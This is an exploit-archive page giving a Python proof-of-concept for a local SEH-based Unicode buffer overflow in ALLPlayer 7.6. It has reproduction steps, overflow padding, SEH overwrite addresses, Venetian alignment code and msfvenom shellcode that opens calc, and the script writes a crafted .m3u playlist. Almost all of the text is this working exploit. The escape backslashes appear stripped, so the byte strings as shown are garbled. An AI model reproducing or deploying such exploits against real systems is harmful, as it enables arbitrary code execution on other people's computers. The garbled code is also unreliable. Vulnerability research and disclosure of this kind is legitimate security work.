ALLPlayer 7.6 Buffer Overflow ↭

# Exploit Title: ALLPlayer v7.6 Local Buffer Overflow (SEH)(Unicode)
# Version: 7.6
# Date: 20-04-2020
# Exploit Author: Xenofon Vassilakopoulos
# Tested on: Windows 7 Home Premium SP1 x86

# Steps to reproduce :
# 1. generate the test.m3u using this exploit
# 2. open ALLPlayer then go to Open audio file
# 3. load the test.m3u file
# 4. calc

filename = "test.m3u"

junk="A"*301

nseh = "x61x6e" # popad align
seh = "x12x74" # pop ebx # pop ebp # ret 0x04

align=("x56" # push esi
"x6e" # venetian shellcode
"x58" # pop eax
"x6e" # venetian shellcode
"x05x19x11" # add eax,0x11001900
"x6e" # venetian shellcode
"x2dx16x11" # sub eax,0x11001600
"x6e" # venetian shellcode
"x50" # push eax
"x6e" # venetian shellcode
"xc3" # retn
)

nop="x90"*45

# msfvenom -p windows/exec CMD=calc -e x86/unicode_mixed BufferRegister=EAX -f python
shellcode= b""
shellcode+= b"x50x50x59x41x49x41x49x41x49x41x49x41x49"
shellcode+= b"x41x49x41x49x41x49x41x49x41x49x41x49x41"
shellcode+= b"x49x41x49x41x49x41x6ax58x41x51x41x44x41"
shellcode+= b"x5ax41x42x41x52x41x4cx41x59x41x49x41x51"
shellcode+= b"x41x49x41x51x41x49x41x68x41x41x41x5ax31"
shellcode+= b"x41x49x41x49x41x4ax31x31x41x49x41x49x41"
shellcode+= b"x42x41x42x41x42x51x49x31x41x49x51x49x41"
shellcode+= b"x49x51x49x31x31x31x41x49x41x4ax51x59x41"
shellcode+= b"x5ax42x41x42x41x42x41x42x41x42x6bx4dx41"
shellcode+= b"x47x42x39x75x34x4ax42x79x6cx69x58x62x62"
shellcode+= b"x49x70x69x70x4dx30x71x50x63x59x48x65x6e"
shellcode+= b"x51x57x50x52x44x54x4bx32x30x6ex50x54x4b"
shellcode+= b"x72x32x6ax6cx54x4bx70x52x6dx44x72x6bx61"
shellcode+= b"x62x6fx38x4ax6fx45x67x4ex6ax6dx56x4dx61"
shellcode+= b"x69x6fx34x6cx4fx4cx51x51x53x4cx79x72x4c"
shellcode+= b"x6cx6dx50x66x61x58x4fx4cx4dx59x71x67x57"
shellcode+= b"x38x62x39x62x62x32x6ex77x74x4bx4ex72x4c"
shellcode+= b"x50x34x4bx50x4ax4fx4cx72x6bx30x4cx4ex31"
shellcode+= b"x51x68x38x63x61x38x79x71x36x71x70x51x62"
shellcode+= b"x6bx71x49x6bx70x69x71x66x73x54x4bx31x39"
shellcode+= b"x6cx58x37x73x6ex5ax6ex69x32x6bx6ex54x64"
shellcode+= b"x4bx5ax61x59x46x50x31x49x6fx74x6cx69x31"
shellcode+= b"x48x4fx6ax6dx7ax61x59x37x70x38x59x50x61"
shellcode+= b"x65x4ax56x4cx43x71x6dx4cx38x6dx6bx43x4d"
shellcode+= b"x4fx34x42x55x67x74x31x48x44x4bx32x38x4c"
shellcode+= b"x64x6bx51x5ax33x61x56x62x6bx6cx4cx6ex6b"
shellcode+= b"x44x4bx6fx68x4bx6cx7ax61x6ax33x64x4bx6b"
shellcode+= b"x54x52x6bx49x71x36x70x42x69x4ex64x6bx74"
shellcode+= b"x6fx34x6fx6bx61x4bx51x51x72x39x4fx6ax4f"
shellcode+= b"x61x59x6fx47x70x71x4fx4fx6fx4ex7ax32x6b"
shellcode+= b"x6ex32x4ax4bx52x6dx61x4dx72x4ax6ax61x32"
shellcode+= b"x6dx42x65x75x62x49x70x79x70x4bx50x62x30"
shellcode+= b"x52x48x4dx61x72x6bx42x4fx35x37x49x6fx4a"
shellcode+= b"x35x37x4bx6cx30x64x75x53x72x61x46x31x58"
shellcode+= b"x45x56x56x35x45x6dx33x6dx49x6fx59x45x4f"
shellcode+= b"x4cx59x76x73x4cx6ax6ax75x30x69x6bx47x70"
shellcode+= b"x30x75x7ax65x35x6bx4ex67x7ax73x50x72x52"
shellcode+= b"x4fx6fx7ax69x70x30x53x49x6fx6ax35x51x53"
shellcode+= b"x70x61x32x4cx6fx73x49x70x41x41"

payload=junk+nseh+seh+align+nop+shellcode

fill="D"*(5000-len(payload))

payload+=fill
f=open(filename,"wb")
f.write('http://'+payload)
print "nFile created with %d bytes" % len(payload)
f.close()

Comments are closed.